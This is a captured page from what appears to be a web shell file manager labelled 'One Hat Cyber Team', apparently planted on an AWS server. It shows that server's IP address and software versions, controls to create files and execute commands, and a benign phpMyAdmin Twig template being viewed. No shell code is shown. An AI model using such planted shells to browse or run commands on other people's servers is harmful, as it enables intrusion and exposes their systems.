⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.97
Server IP:
13.127.59.50
Server:
Linux ip-172-31-46-210 5.15.0-1033-aws #37~20.04.1-Ubuntu SMP Fri Mar 17 11:39:30 UTC 2023 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.3-4ubuntu2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
phpmyadmin
/
templates
/
table
/
insert
/
View File Name :
continue_insertion_form.twig
<form id="continueForm" method="post" action="tbl_replace.php" name="continueForm"> {{ Url_getHiddenInputs(db, table) }} <input type="hidden" name="goto" value="{{ goto }}"> <input type="hidden" name="err_url" value="{{ err_url }}"> <input type="hidden" name="sql_query" value="{{ sql_query }}"> {% if has_where_clause %} {% for key_id, where_clause in where_clause_array %} <input type="hidden" name="where_clause[{{ key_id }}]" value=" {{- where_clause|trim }}"> {% endfor %} {% endif %} {% set insert_rows %} <input type="number" name="insert_rows" id="insert_rows" value=" {{- insert_rows_default }}" min="1"> {% endset %} {{ 'Continue insertion with %s rows'|trans|format(insert_rows)|raw }} </form>